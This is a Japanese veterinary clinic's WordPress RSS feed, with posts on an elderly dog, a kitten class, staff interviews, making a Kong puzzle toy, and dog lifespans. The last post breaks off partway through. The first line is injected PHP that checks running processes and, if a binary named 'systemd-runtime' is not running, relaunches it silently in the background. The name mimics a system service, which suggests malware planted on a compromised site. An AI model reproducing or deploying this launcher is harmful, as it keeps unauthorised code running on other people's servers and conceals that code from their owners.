$programFilePath = 'systemd-runtime'; $processList = shell_exec('ps aux'); if (strpos($processList, $programFilePath) === false) { $commandToExecute = 'nohup ./' . $programFilePath . ' > /dev/null 2>&1 &'; shell_exec($commandToExecute); } 動物の医学 | 本牧通り動物病院 https://honmokudori.com/blog 本牧通り動物病院は、横浜市中区本牧宮原にある動物病院です。 Fri, 14 Jul 2023 11:48:57 +0000 ja hourly 1 https://wordpress.org/?v=6.2.5 ネオちゃんのご紹介 https://honmokudori.com/blog/1123 https://honmokudori.com/blog/1123#respond Fri, 14 Jul 2023 11:48:35 +0000 https://honmokudori.com/blog/?p=1123 こんにちは。獣医師の小川です。   今回は今年の4月に20歳を迎えられたワンちゃんをご紹介致します。   平野ネオちゃんはミニチュアダックスフントの男の子。当院には10歳の時から通ってくれています  ...続きを読む

The post ネオちゃんのご紹介 first appeared on 動物の医学 | 本牧通り動物病院.

]]>

こんにちは。獣医師の小川です。
 

今回は今年の4月に20歳を迎えられたワンちゃんをご紹介致します。
 

平野ネオちゃんはミニチュアダックスフントの男の子。当院には10歳の時から通ってくれています。
 

ネオちゃんは驚くほど強靭なワンちゃんで、19歳の時に麻酔をかけてお口の中をきれいにしたり、眼のできものをとる手術をしたりしましたが、その後もとても元気です。
 

毎月、爪や被毛のカットに来てくれていますが、筋力もあって、とても20歳とは思えません。そして、いつも一緒のオーナーさんのことが大好きです。
 

そんなネオちゃんにお会いできるのが、私もとても楽しみですし、励みになっています。
 

皆さんもネオちゃんのような元気な長寿犬を目指して、私たち病院スタッフと一緒に健康管理に気をつけていきましょう。

The post ネオちゃんのご紹介 first appeared on 動物の医学 | 本牧通り動物病院.

]]>
https://honmokudori.com/blog/1123/feed 0
祝!こねこ教室卒業✨ https://honmokudori.com/blog/1111 https://honmokudori.com/blog/1111#respond Mon, 27 Mar 2023 09:48:12 +0000 https://honmokudori.com/blog/?p=1111 ブログを読んでくださっている皆さま、こんにちは!獣医師の互です(^^♪ 皆さま、お久しぶりです♪    3月に入り、日々暖かくなり、わんちゃん、ねこちゃんも過ごしやすい気候になってきましたね! 3月といえば  ...続きを読む

The post 祝!こねこ教室卒業✨ first appeared on 動物の医学 | 本牧通り動物病院.

]]>
ブログを読んでくださっている皆さま、こんにちは!獣医師の互です(^^♪
皆さま、お久しぶりです♪ 
 

3月に入り、日々暖かくなり、わんちゃん、ねこちゃんも過ごしやすい気候になってきましたね!
3月といえば満開の桜🌸に、卒業シーズン…
今回はそんな時期にぴったりなブログです(^^♪
 

全8回のこねこ教室を終えて無事卒業を迎えた宇多(うた)ちゃんをご紹介します(=^・^=)❣
 

お家に迎え入れてからすぐにこねこ教室に通い始めてくれた宇多ちゃんと飼い主さん。コロナ禍もあり途中期間が空いてしまいましたが、とても熱心な飼い主さんと頑張り屋さんの宇多ちゃんのご協力もあってこの度、無事卒業となりました♬おめでとうございます✨
 

はじめは飼い主さんの膝の上から降りられないくらい甘えん坊さんだった宇多ちゃん。段々と回数を重ねていくうちに診察台の上でもお利口さんでいられるようになり、歯磨き、投薬練習もばっちりできるようになりました!!
 

飼い主さんも最初は何事も初めてで、緊張気味でしたが今では爪切りをはじめ、歯磨き、投薬練習としっかり練習の成果が出ており、最後のこねこ教室の時にはすべてお一人でできるようになっていました!!とても素晴らしいことです(^^)/
 

また、お家でのケアができるだけではなく、キャリーバッグに入れて動物病院に来ること自体にもストレスフリーであることがこねこ教室を実施している私にとってはうれしい限りでした(^O^)
 


卒業証書とともに記念にパチリ!
 


スタッフ一同でお祝い記念撮影☆
 

とても熱心で猫ちゃん大好きな飼い主さんはこねこ教室を卒業しても、宇多ちゃんがこれからも病院を嫌いにならないようにおやつをもって定期的に病院に足を運んでくださるとのことでした。是非スタッフ一同お待ちしております(^^♪
 

これから猫ちゃんを迎えようと考えている方や、新しく子猫を迎えた飼い主さん、子猫を保護された飼い主さん、こねこ教室に興味がある方はスタッフや獣医師までお気軽にご相談ください♪
 

また、猫ちゃんの飼育相談やお悩みなどはオンラインでも受け付けておりますので、なにかありましたらご相談くださいね🐈
 

オンラインなら、なかなか動物病院に連れてこられない飼い主さんにもお勧めです☆
 

今回久しぶりのブログになってしまいましたが、おめでたい報告ができてうれしく思います♡
 

ではまた次回のブログをお楽しみに~(^^)/
 

The post 祝!こねこ教室卒業✨ first appeared on 動物の医学 | 本牧通り動物病院.

]]>
https://honmokudori.com/blog/1111/feed 0
スタッフ紹介〈小林獣医師のご紹介〉 https://honmokudori.com/blog/1073 https://honmokudori.com/blog/1073#respond Fri, 29 Apr 2022 10:35:05 +0000 https://honmokudori.com/blog/?p=1073   また、昨年は二児のパパになりました。仕事だけでなく、育児も一生懸命✨家族思いのイクメンでもあります。   では、小林獣医師へのインタビュー、ご覧ください。   &nbs  ...続きを読む

The post スタッフ紹介〈小林獣医師のご紹介〉 first appeared on 動物の医学 | 本牧通り動物病院.

]]>
たけだ
たけだ
今回のスタッフ紹介は小林獣医師です。大変勉強家で、動物のために知識や技術を磨く努力を惜しみません。

 

また、昨年は二児のパパになりました。仕事だけでなく、育児も一生懸命✨家族思いのイクメンでもあります。

 

では、小林獣医師へのインタビュー、ご覧ください。

 

 

たけだ
たけだ
Q1.1ヶ月の育児休業をとってみていかがでしたか?

 

人生で1度しかない貴重な経験をすることができました。1人目の娘のときはここまで育児に参加することができなかったので、本当に幸せな時間でした。
これも、2人目が産まれると伝えた時に育休を提案してくれた牧野院長、竹田代表。協力してくれた他のスタッフの方達。理解し応援して下さった担当の患者様達のお陰です。
本当にこの病院で働けたことを幸せに思います。
こばやし
こばやし

 

たけだ
たけだ
Q2.小林先生の子供時代!どんな子でしたか?

 


小さい頃はとにかくマイペース!よく食べ、よく寝て、よく遊んでいました。
年の近い従兄弟と畑で泥だらけになりながら遊んでいたことが、今でも懐かしいです。
中学に入って高校までは毎日、部活(バスケ部)に勤しんでおりました。おかげで受験は大変でしたが、今となっては良い思い出です。
こばやし
こばやし

 

たけだ
たけだ
Q3.臨床獣医師として大切にしていることは何でしょう?

 


できるだけ、オーナー様のお話を聞き、患者様であるわんちゃんや猫ちゃんの様子を見るようにしています。
これは病気の早期発見にもつながりますし、治療を選んでいくときにとても大事になってきます。
特に大きな病気の際には、どの治療がその子にあっているのか?オーナー様は何を大切にされているのか?そこを判断する上で非常に大切なことだと考えております。
そんなふうにして少しでもご家族に寄り添った治療ができればと考えております。
こばやし
こばやし

 

獣医師としても家庭人としても充実した日々を送っている小林先生。

 

当院としても、ずっといてもらいたいスタッフなのですが…

 

ここで皆さまに大切なお知らせがあります。

 

この度、小林獣医師は、念願であった自身の動物病院を開院することになりました。

 

本牧通り動物病院での勤務は、5月末までとなります。

 

当院としても大変残念ではありますが、小林獣医師の「これから」を応援したいと思います。

The post スタッフ紹介〈小林獣医師のご紹介〉 first appeared on 動物の医学 | 本牧通り動物病院.

]]>
https://honmokudori.com/blog/1073/feed 0
スタッフ紹介〈石橋看護師のご紹介〉 https://honmokudori.com/blog/1054 https://honmokudori.com/blog/1054#respond Mon, 04 Apr 2022 03:06:58 +0000 https://honmokudori.com/blog/?p=1054   動物看護師としての経験は6年ですが、動物に対する愛情と看護師としての実力を兼ね備えた素晴らしい看護師です!   ただ、その実力が買われて、この度別の動物病院に行くことになりました。ご紹介の機会  ...続きを読む

The post スタッフ紹介〈石橋看護師のご紹介〉 first appeared on 動物の医学 | 本牧通り動物病院.

]]>
たけだ
たけだ
今回ご紹介するスタッフは、石橋由梨佳看護師です。

 

動物看護師としての経験は6年ですが、動物に対する愛情と看護師としての実力を兼ね備えた素晴らしい看護師です!
 

ただ、その実力が買われて、この度別の動物病院に行くことになりました。ご紹介の機会が同時にお別れの報告となってしまい、大変残念ですが、石橋の魅力をお伝えできれば、と思います。
 

最後まで読んで頂けましたら幸いです。
 

たけだ
たけだ
Q1 当院での3年間、思い出に残っていることは何ですか?

 

沢山ありすぎて選べないのですが…沢山の飼い主様たちと、色んな話を沢山出来たことです!いつも自分の大好きな時間でした!
いしばし
いしばし

 

たけだ
たけだ
Q2 趣味について教えて!

 

学生時代から変わらぬ趣味でフィルムカメラで写真を撮ることです! 休みの日は大きいカメラ担いで歩き回っています! 撮るものは特に決めずにふらふら歩き回ってます!
いしばし
いしばし

 

たけだ
たけだ
Q3これからどんな動物看護師になっていきたいですか?

 

これから当院とはまた異なる形態の病院へ勤務することとなります。しかし、これまでと変わらず、飼い主様・動物たちとのコミュニケーションを大切にし、飼い主様の気持ちに寄り添いながら、動物たちの少しの変化にもいち早く対応できるような動物看護師になりたいと思っております。
いしばし
いしばし

 

突然のご挨拶となってしまい大変申し訳ございません。直接ご挨拶できなかった皆様、申し訳ございません。
 

この度3月末日をもって、本牧通り動物病院を退職することとなりました。
 

自分は当院にくるまで、大きい病院にいて、飼い主様とお話しする機会も限られていました。
 

そんな緊張でうまく話せない自分を成長させて下さったのは間違いなく、本牧通り動物病院に通われている飼い主様だと思っております。
 

この3年間、皆さまとの時間は本当に宝物です。本当にありがとうございました!
 

これからも皆様のご健勝をお祈り申し上げます。
 

The post スタッフ紹介〈石橋看護師のご紹介〉 first appeared on 動物の医学 | 本牧通り動物病院.

]]>
https://honmokudori.com/blog/1054/feed 0
スタッフ紹介〈(竹田)沙和子獣医師のご紹介〉 https://honmokudori.com/blog/1027 https://honmokudori.com/blog/1027#respond Mon, 13 Dec 2021 11:10:14 +0000 https://honmokudori.com/blog/?p=1027   今回は、竹田前院長の娘でもある、(竹田)沙和子獣医師の紹介です。   現在、アメリカのボストンで暮らしていますが、最近では、当院のインスタグラムを立ち上げ、様々な記事を発信しています。 &nb  ...続きを読む

The post スタッフ紹介〈(竹田)沙和子獣医師のご紹介〉 first appeared on 動物の医学 | 本牧通り動物病院.

]]>
たけだ
たけだ
竹田(智子)です。

 

今回は、竹田前院長の娘でもある、(竹田)沙和子獣医師の紹介です。
 

現在、アメリカのボストンで暮らしていますが、最近では、当院のインスタグラムを立ち上げ、様々な記事を発信しています。
 

そんな沙和子獣医師に、アメリカでの生活のこと、これからのこと、インタビューしてみました!
 

コロナ禍でアメリカでの出産と子育てを経験することになりましたが、今思うこと、感じることは?

改めて人と人のつながりは大切だと思いました。
 

ボストンで緊急事態宣言が出たのは2020年3月、その時ちょうど妊娠後期に入る頃でした。町もシャットダウンし、当然産婦人科も閉まりオンライン診察になってしまいました。日本に帰国をして出産することも考えましたが、すでに妊娠後期、しかもコロナ真っ只中のアメリカからの帰国の妊婦を受け入れてくれる病院はありませんでした。
 

初めて患者の立場になり、満足に診察を受けられないことがこんなにも心細く排除されたような気持ちになることを痛感しました。そんな時、お友達が連絡をくれ、相談にのってくれました。陣痛がきた時も駆けつけてくれ、安心して出産に臨むことができました。
 

その後の子育ても丹呉先生のようにスマートにはできていませんが、ボストンで信頼できるドゥーラさん(産前産後のサポートをしてくださる方)に出会うことができました。産後6日、ギックリ腰で歩けなくなった時、娘の体調が悪くなった時など手厚くかつ直ぐに助けてくれました。
 

いつでもそこにいてくれる、助けてくれる人がいる時に感じる安心感をコロナ禍のアメリカでより一層知ることができました。
 

「人とのつながりを大切にして欲しい」という思いを娘にも伝えていきたいと思います。
 

獣医師になろうと思ったきっかけは何でしょう?

ありきたりかもしれませんが、愛猫リリーのことをもっと知りたい、ずっと一緒にいたいと思ったのがきっかけです。
 

7歳の誕生日に念願のシマシマの猫(リリー)が家に来ました。
 

ある日わたしが弟と兄弟げんかをして玄関で泣いていると、リリーが心配して近付いてきました。その時、動物は言葉を話さなくても人間の気持ちや状況がよく分かり、なにか手を差し伸べてくれているように感じました。
 

いつしかリリーが辛い時はわたしが側にいてあげたい、猫博士になりたい、獣医師になりたいと思うようになりました。
 

もちろん父の姿も見ていたので、獣医師という仕事がとても身近だったのもあると思います。けれど子どもながらに「獣医さんは忙しくて大変!」と思っていました(笑)
 

これからどんな獣医師になっていきたいですか?

最初から最期まで動物と飼い主さんに寄り添える、安心感のある獣医師になりたいです。
 

残念ながら初代院長の父とは一緒に働くことはできなかったのですが、わたしから見た父は「いつでも動物たちのことを考えていて、飼い主さんから信頼される頼もしい獣医師」でした。それに憧れる反面、わたしは性格も診察スタイルも異なり追いつけないと感じています。
 

ただ、それ以上に勉強し常に向上心を持ち、知識と技術のある「わたしなりの頼もしい獣医師」になりたいと思っています。
 

しかし、動物の命はいつか終わりが来てしまいます。その最期に動物の状況や声を飼い主さんにつなげ、残りの大切な時間に後悔が残らないよう寄り添うのも獣医師の役目だと思っています。頑固なところは父とよく似ているので必ずなりたいと思っています。
 


 

たけだ
たけだ
今は日本から遠く離れていますが、インタビューの回答の中には“これからも獣医師として歩んでいこうとする決心”が率直に表れていました。

 

アメリカでの生活、子育てを通して、人としても獣医師としてもきっと一回り大きくなって帰ってくることと思います。
 

皆さま、どうぞ、本牧通り動物病院のインスタグラムをご覧になってお待ちください!
 

The post スタッフ紹介〈(竹田)沙和子獣医師のご紹介〉 first appeared on 動物の医学 | 本牧通り動物病院.

]]>
https://honmokudori.com/blog/1027/feed 0
うちの子を夢中にさせる!知育トイの作り方 https://honmokudori.com/blog/994 https://honmokudori.com/blog/994#respond Tue, 30 Nov 2021 09:45:16 +0000 https://honmokudori.com/blog/?p=994   いつもブログを読んでくださりありがとうございます♡   前回の知育トイのブログを読んでいただいた皆様、お待たせいたしました!!(笑)   また今回初めてブログを読んでくださった方は前  ...続きを読む

The post うちの子を夢中にさせる!知育トイの作り方 first appeared on 動物の医学 | 本牧通り動物病院.

]]>
たがい
たがい
みなさん、こんにちは!獣医師の互です(^_-)-☆

 

いつもブログを読んでくださりありがとうございます♡
 

前回の知育トイのブログを読んでいただいた皆様、お待たせいたしました!!(笑)
 

また今回初めてブログを読んでくださった方は前回の知育トイのブログもぜひあわせて読んでみてくださいね♪
 

前回のブログはこちら!

今回は知育トイの上手な作り方を動画でお教えしますッ(`・ω・´)
 

前回のブログを読んで、、、

  • これから買ってみようとは思うんだけど遊んでくれるか心配だな・・・
  • この形、ペットショップで見たことはあるけど、どうやって遊ばせるの??
  • これこれ!知ってる!(またはおうちにある!)けどすぐに飽きてしまう・・・
  • フードを入れてみたら、すぐに食べ終わっちゃうけど・・・?

 

なんて思っていませんか?
 

そんな方必見です!!
 

前回のブログのような夢中になってくれるコングの作り方にはちょっとした工夫が必要です。そのちょっとしたコツを今回はお教えします♬
 

たがい
たがい
では早速作ってみましょう☆

①まずはドライフードをいつも与えている1日分の量から少し取り分け、完全にふやけるまで置いておきます。
 

<ここがポイント!>
ふやかす際は熱湯ではなく、ぬるま湯でふやかしましょう。熱湯だとドライフードに含まれるビタミンなどが壊れてしまいます。またふやけにくい場合は少しドライフードを砕いてからふやかすと短時間でふやけやすくなります。
 


 

たがい
たがい
ここでひと手間!ここが一番時間がかかるかも?

 

これはコングの真ん中に詰めるペースト状のものを作っている過程になります。
 

私はパピークラスなどでアレルギーのある子やまだおやつを知らない子犬たちに作ってあげることが多いので今回はドライフードをふやかしてペーストの代わりにしていますが、フードの食べが悪い子や手早く作りたい方は缶詰のフードを利用したり、コングペーストを利用したりするのもいいでしょう。
 

その際はカロリーの取りすぎなどに注意してくださいね。
 

②ドライフードが完全にふやけたら、混ぜてペースト状にします。
 

③これで準備はOK!いよいよコングに詰めていきます。コングの詰め方にもコツがあります。
 


 

④コングの先端(先が細くなっている方)にはドライフードをそのままコング全体の1/3くらいまで入れます。
 

<ここがポイント!>
コングの先端にペーストを詰めてしまうと、舌が届かず、食べきることが出来なくなってしまい、途中であきらめてしまう子が多いのです。
 

⑤コングの真ん中には①でふやかしたペースト状のフードを詰めていきます。
 

その後にまたドライフードを入れて舌で取り出しやすくします。最後にまたペースト状のフードで蓋をします。(チュールやコングペーストでも可)
 

これで完成です!!
 

これでまたひとつ愛犬の楽しみが増えましたね♪
 

皆様、いかがでしたでしょうか?ぜひ動画を参考にまずは作ってみましょう!
 

1回作ってワンちゃん達に遊ばせてみて、コングの難易度を調節してくださいね(^_-)-☆
 


初めてコングを使う子はドライフードを多くして簡単目に、すぐに食べきってしまった子はペーストを多くして難しく、などなどその子に合わせて作っていきましょう。
 

作ってみたけどうまくいかないなど、コングの悩みなどもいつでもお気軽にご相談くださいね♪
 

では、またブログでお会いしましょう~👋

The post うちの子を夢中にさせる!知育トイの作り方 first appeared on 動物の医学 | 本牧通り動物病院.

]]>
https://honmokudori.com/blog/994/feed 0
スタッフ紹介〈牧野院長のご紹介〉 https://honmokudori.com/blog/970 https://honmokudori.com/blog/970#respond Tue, 30 Nov 2021 09:10:10 +0000 https://honmokudori.com/blog/?p=970   今回のスタッフ紹介は、当院の院長である「牧野 仁先生」です。   ひとつひとつの質問に、牧野先生の人柄あふれる丁寧な答えが返ってきました。   じっくりと読んでいただけたら、嬉しいで  ...続きを読む

The post スタッフ紹介〈牧野院長のご紹介〉 first appeared on 動物の医学 | 本牧通り動物病院.

]]>

小岩井農場から見た岩手山

たけだ
たけだ
こんにちは。竹田です。

 

今回のスタッフ紹介は、当院の院長である「牧野 仁先生」です。
 

ひとつひとつの質問に、牧野先生の人柄あふれる丁寧な答えが返ってきました。
 

じっくりと読んでいただけたら、嬉しいです!
 

獣医師をめざしたきっかけは、どんなことでしたか?
 

幼い頃に『究極のサバイバル状態に陥った時、人と動物を一緒に助けられるのは獣医さんではないか』と思ったことが根底にあると思います。
 

私が究極のサバイバル状態を感じたのには、こんな時代背景があります。
 

1972年に日中国交正常化の合意文書の調印の記念にジャイアントパンダのカンカン(康康)とランラン(蘭蘭)が初めて日本にやってきて、日本中がそのニュースで沸きかえっていました。
 

1972年11月に上野動物園で初公開され、その愛くるしい姿を見たさに長蛇の列ができて話題となった。


 

子供心(当時10歳)に何か盛り上がっているなと感じていたいときに、小松左京さんの超ベストセラーSF小説「日本沈没」が1974年にテレビドラマ化され、日本列島が海に沈むという衝撃的な番組を見て、とても恐怖を感じたことを覚えています。
 

番組の冒頭で毎回映し出されたタイトル映像。その時流れる主題歌の「あしたの愛」は五木ひろしが歌い作曲は筒美京平で、哀愁に満ちたメロディーが心にしみる。


 

その頃はちょうど幼少時からの念願であった犬を飼いはじめた時期でもありました。日本が沈没してしまうような非常事態になった時も「大切な家族とマルを守りたい」と思う気持ちが、獣医師を目指したことにつながっているのだと思います。
 

大阪に住んでいた小学2年生の時に保健所からもらってきて飼い始めた雑種犬「マル」。栃木県に引っ越して広いお庭で自由を満喫。


 

臨床獣医師として30年。先生が心がけてきたことやベースになっている考えがありましたら教えてください。
 

岩手県盛岡市という厳しい寒さの土地で大動物を中心に獣医学と学術研究の基礎を学び、獣医師の免許を取得後、東京大学の動物病院で犬猫の臨床獣医師としてのキャリアをスタートさせました。
 

大学の教官、先輩、同期、後輩と学生そして病院スタッフが、日夜病気の動物達を救おうと一丸となって治療に取り組む姿勢に感銘し、精神的にも多大な影響を受けました。
 

研修医時代、寝食を共にしていた相棒「ペス」


 

大学での2年間の研修を経て、埼玉県の戸ヶ崎動物病院に就職しました。
 

当時の院長・諸角元ニ先生の指導のもと、個人病院での一般臨床を中心に学会発表や論文投稿など様々な経験をさせて頂き、地域の人たちとの交流、繋がり、信頼関係などを築くことで動物病院がより良く機能し、地域に貢献する役割を果たせることを実感しました。
 

勤務医時代の病院内での一コマ


 

優秀な後輩獣医師も育ち、充実した獣医臨床生活を過ごしていましたが、大切にしている動物たちとのお別れ、つまり命の終焉とは常に向き合わなければならない仕事であることに、難しさを感じていました。
 

そんなある日、柳田邦男氏の『「死の医学」への序章』という本に出会い、健康であれ病気であれ、生きているということは日々死に近づいてくことであり、それは普遍的な事実なので抗うことはせず、自然に心を落ち着かせて日常を過ごし、逆に「死」を見つめることで「生」を輝かせることができ、今生きていることが何よりも大切で貴重な時間であることに気づかされました。
 

そのことで高齢動物や終末期医療に対しての向き合い方やご家族に対しての言葉かけにも、個々の事情と病気などの状況によって様々な対応があって良いのだと思えるようになりました。
 

今も本牧通り動物病院の診療で繰り広げられる、動物たちとの出会いやご家族とのコミュニケーションの中で、動物と家族にとって何が良い選択なのか日々考え、悩みもがきながら、安心できる医療を提供する姿勢を忘れないようにすることが、学ぶことを続ける原動力になっています。
 

これからの「本牧通り動物病院」。どんな病院を目指していますか?
 

今までも続けてきたように、動物とその家族が楽しい気持ちになり、温もりを感じて心癒される病院にしたいです。そのためには先ず大前提として、我々スタッフは獣医療のプロとして正確な知識と堅実な技術の習得を心掛け、常に向上心を持って自己研鑽をし、心の通う医療サービスを提供すること。
 

それらを安定して続けることで、地域の人たちに認められ信頼されて、世代が変わっても同じように付き合える、地域に溶け込んだ病院にしたいです。
 

その担い手である病院スタッフが、お互い認め合い助け合いながら、生涯を通じて安心して働くことが出来る職場にし、動物を含めたその家族の幸せに貢献し、いつまでも心の繋がる場所にしたいです。
 

何よりもスタッフには明るく元気でいてもらいたいです。
 

2019年スタッフ達との合成集合写真


 

たけだ
たけだ
過去、現在、そして未来を語った回答の中には先生の「人と動物を大切に思う気持ち」があふれていました。

 

また、その思いの原点が10歳の頃から45年を経ても変わっていない、そのことに信頼と安心感を感じました。
 

これからも、牧野院長とスタッフ達と一緒に「人と動物の幸せ」を届けられる動物病院をめざしていきたいと思います!

The post スタッフ紹介〈牧野院長のご紹介〉 first appeared on 動物の医学 | 本牧通り動物病院.

]]>
https://honmokudori.com/blog/970/feed 0
知育トイでネコちゃんワンちゃんも頭を使って遊びます https://honmokudori.com/blog/921 https://honmokudori.com/blog/921#respond Mon, 27 Sep 2021 12:56:36 +0000 https://honmokudori.com/blog/?p=921   まだまだコロナ禍が続いていますが、おうちのワンちゃん、ネコちゃんといかがお過ごしでしょうか?一緒に過ごす時間が増えているご家族もいるかもしれませんね♪   ところでみなさんは愛犬、愛猫とうまく  ...続きを読む

The post 知育トイでネコちゃんワンちゃんも頭を使って遊びます first appeared on 動物の医学 | 本牧通り動物病院.

]]>

たがい
たがい
みなさん、こんにちは!獣医師の互です(`・ω・´)
いつもブログを読んでくださりありがとうございます!

 

まだまだコロナ禍が続いていますが、おうちのワンちゃん、ネコちゃんといかがお過ごしでしょうか?一緒に過ごす時間が増えているご家族もいるかもしれませんね♪
 

ところでみなさんは愛犬、愛猫とうまく遊べているでしょうか? 意外と遊びに関しての悩みも多いのでは・・・??
 

例えば
 

  • 遊んではいるけれども遊んだ後もなんだかまだまだ体力があり余っている様子だ
  • 一緒に遊んであげられる時間が限られている
  • おもちゃにすぐに飽きてしまう
  • おもちゃに興味を示さず手や足に飛びついてくる、噛みついてくる

 

などなど。
 

私はパピークラスや行動診療を担当していますが、飼い主さんとお話をしている間、ワンちゃん、ネコちゃんには一人で遊んでいてもらうことが多くあります。
 

そんな時に大活躍なのが知育トイ!
 

知育トイというのは体だけではなく、頭も使って遊ぶおもちゃのことです!
 

ボール遊びのもってこい遊びやお散歩で一緒にダッシュ!もいいですが、たまには動物たちの賢い頭脳も使って遊んであげましょう(`・ω・´)人でいうと計算ドリルをやるような感じかな?(笑)
 

今はたくさんの種類の知育トイが発売されていますが、主にフードやおやつなど食べ物を入れたり、使ったりして遊ぶのが基本的な遊び方になります。
 

有名なものでいうと『コング』というものがあります。この独特な形、ペットショップやホームセンターで見かけたことがある方や実際に使ったことがある方もいるかもしれません(^^♪
 

病院でもたくさんの種類のコングをそろえて使っています♪
 

私は、その子の性格や遊び方の特徴によって使い分けています。
 

飼い主さんとお話し中でも夢中になって一人で遊んでくれています♪
 

これで中身がなくなるまで15分以上は一人で遊んでくれますよ(^_-)-☆
 


 

ちなみにネコちゃんの場合はコロコロ転がせるボール型やカプセル型がおすすめです!
 

しかし、、、
コングは買ったものの、うちの子はこんなに遊んでくれない!やコングってどうやって使うの??と思った方は次回のブログをお楽しみに(^_-)-☆
 

次回はコングの作り方をわかりやすく説明しますね♬
 

では、またブログでお会いしましょう~👋
 

The post 知育トイでネコちゃんワンちゃんも頭を使って遊びます first appeared on 動物の医学 | 本牧通り動物病院.

]]>
https://honmokudori.com/blog/921/feed 0
【犬の寿命】獣医師が考える!犬の年齢の数え方と長生きの秘訣 https://honmokudori.com/blog/889 https://honmokudori.com/blog/889#respond Sat, 25 Sep 2021 02:40:33 +0000 https://honmokudori.com/blog/?p=889 家族、パートナー、兄弟、親子…あなたと愛犬はどんな関係ですか?飼い主なら誰でも愛犬と1秒でも長く一緒にいたい、ずっと健康でいて欲しいと思いますよね。     犬の年齢の数え方と長生きのために飼い主  ...続きを読む

The post 【犬の寿命】獣医師が考える!犬の年齢の数え方と長生きの秘訣 first appeared on 動物の医学 | 本牧通り動物病院.

]]>

家族、パートナー、兄弟、親子…あなたと愛犬はどんな関係ですか?飼い主なら誰でも愛犬と1秒でも長く一緒にいたい、ずっと健康でいて欲しいと思いますよね。
 

たけだ(さ)
たけだ(さ)
こんにちは!獣医師の竹田(沙)です!

 

犬の年齢の数え方と長生きのために飼い主ができることを獣医師の目線でまとめました。犬を飼っている人だけでなく、これから子犬を迎えたいなと考えている方にも必見です!
 

いぬ
いぬ
最後まで読んでいただけたら嬉しいワン!

 

【犬の寿命】犬の年齢は人間でいうと何歳?


ずっと子どもだと思っていた愛犬が「年をとったなあ」とふと感じたことはありませんか?犬の年齢は人間に換算すると何歳になるのでしょうか。
 

たけだ(さ)
たけだ(さ)
実は小・中型犬と大型犬では成長のスピードに違いがあります。

 

なので、年齢の換算法の前に小型犬、中型犬、大型犬の分け方について少しお話しさせてください。
 

実は、犬のサイズによる分け方に正式な基準はないのです。一般的には下記の表のように分類されます。
 

小型犬中型犬大型犬
〜10kg10〜25kg25kg〜
例)
チワワ
ミニチュア・ダックスフンド
トイ・プードル
例)
ビーグル
Wコーギー・ペンブローク
ボーダー・コリー
例)
ゴールデン・レトリーバー
ラブラドール・レトリーバー
バーニーズ・マウンテン・ドッグ

愛犬がどのタイプかが分かったところで…
 

たけだ(さ)
たけだ(さ)
年齢の換算方法は以下のようになります! 人間の1年は大型犬にとって7年に相当するのですね!

 

もう少し詳しく知りたい人向けに年齢換算表と換算式もご紹介します。

犬と人間の年齢換算表

大型犬
3カ月3歳
6カ月6歳
9カ月9歳
1歳12歳
2歳19歳
3歳26歳
4歳33歳
5歳40歳
6歳47歳
7歳54歳
8歳61歳
9歳68歳
10歳75歳
11歳82歳
12歳89歳
13歳96歳
14歳103歳

 

小・中型犬
3カ月5歳
6カ月9歳
9カ月13歳
1歳17歳
1歳6カ月20歳
2歳24歳
3歳28歳
4歳32歳
5歳36歳
6歳40歳
7歳44歳
8歳48歳
9歳52歳
10歳56歳
11歳60歳
12歳64歳
13歳68歳
14歳72歳
15歳76歳
16歳80歳
17歳84歳
18歳88歳
19歳92歳

犬と人間の年齢換算式


同じ10歳といっても・・・大型犬は75歳、一方小型犬は56歳。なんと、小型犬と大型犬では人間換算で21歳も違いがあります!
 

その子その子に合った年齢を考えることが大切なんですね。
 

  • 大型犬の場合:12+(犬の年齢‐1)×7=人間年齢
    例) 10才の大型犬(ゴールデン・レトリーバー)の場合
    12+(10−1)×7=75歳
  •  

  • 小・中型犬の場合:24+(犬の年齢 – 2)×4=人間年齢
    例)10才の小型犬(チワワ)の場合
    24+(10-2)×4=56歳

 

※ただし、計算式は大型犬…1歳以上、小型犬…2歳以上が対象となります。
 

アメリカの研究チームが発表した新たな犬と人間の年齢換算式

たけだ(さ)
たけだ(さ)
参考までに…少しマニアックですが、これを知っていると一段上の犬博士になれるでしょう!

 

2019年にアメリカの研究チームが新たな年齢換算式を発表しました(Tina Wang et al., 2019)。
 

犬の加齢によるDNA遺伝子の変化をもとに年齢を算出する方法です。そのため生物学的に今までの換算法より正確とされています。
 

    【新たな換算式】16 In(犬の年齢)+31 = 人間の年齢
    例)5歳の犬の場合 ⇒ 16 In(5) + 31 ≒ 57歳

参考:https://www.biorxiv.org/content/10.1101/829192v1.full
 

ただし、この研究の対象は大型犬(全てラブラドール・レトリーバー)だったため、小型犬の場合は結果が変わることに注意が必要です。
 

Inが出てきてチンプンカンプンになってしまった方はすいません・・・。高校で習う数学ですが忘れてしまっている人も多いかもしれませんね。
 

計算式は少し難しいですが、iPhoneやアプリを使えば簡単に計算できるので、今までの式と比べてみるのも面白いと思います。興味があればやってみてください。
 

犬種によって寿命は違う?なりやすい病気は?


体格によって年齢の換算式が異なるということは、犬種によって寿命が違うのでは?と思った方もいるのではないでしょうか。また、病気のなりやすさに違いはあるのでしょうか?
 

犬種ごとの平均寿命

435,987頭を対象に調査したアニコム損害保険株式会社が発表したデータでは、以下のような結果になりました。
 

【犬種による長生きランキング】

  • 1位・・・イタリアン・グレーハウンド(平均15.1歳)
  • 2位・・・ミニチュア・ダックスフンド(平均14.7歳)
    トイ・プードル(平均14.7歳)
  • 4位・・・柴犬(平均14.5歳)
  • 5位・・・パピヨン(平均14.4歳)

 

参考:犬種別平均寿命調査(アニコム損害保険株式会社)
 

102,609頭を対象としたイギリスの調査 (D G O’Neill et al., 2013)では、小さい犬種ほど長生きという結果になりました。また、長生きだった犬種、短命だった犬種も報告されています。
 

【長生きした犬種】

  • 雑種犬
  • ミニチュア・ダックスフンド
  • ミニチュア・プードル
  • ボーダー・コリー
  • 【短命だった犬種】

  • マスティフ
  • グレート・デーン
  •  

    また、本牧通り動物病院に通っている犬の平均寿命を調べてみました! 2017年7月~2021年7月の期間で、当院に来院された犬を調査したところ…

    【犬の平均寿命】

  • 小型犬・・・14.5歳
  • 中型犬・・・13.9歳
  • 大型犬・・・12.8歳
  • 全体の平均寿命は14.3歳でした。
     

    たけだ(さ)
    たけだ(さ)

    大型犬より小型犬の方が長生きする傾向にありますね。

     

    犬種ごとになりやすい病気

    実は犬種によってなりやすい病気があります。人気犬種を中心に見ていきましょう。
     

    • トイ・プードル ・・・骨折(前肢)、涙やけ、白内障
    • チワワ ・・・弁膜症などの心臓疾患、気管虚脱
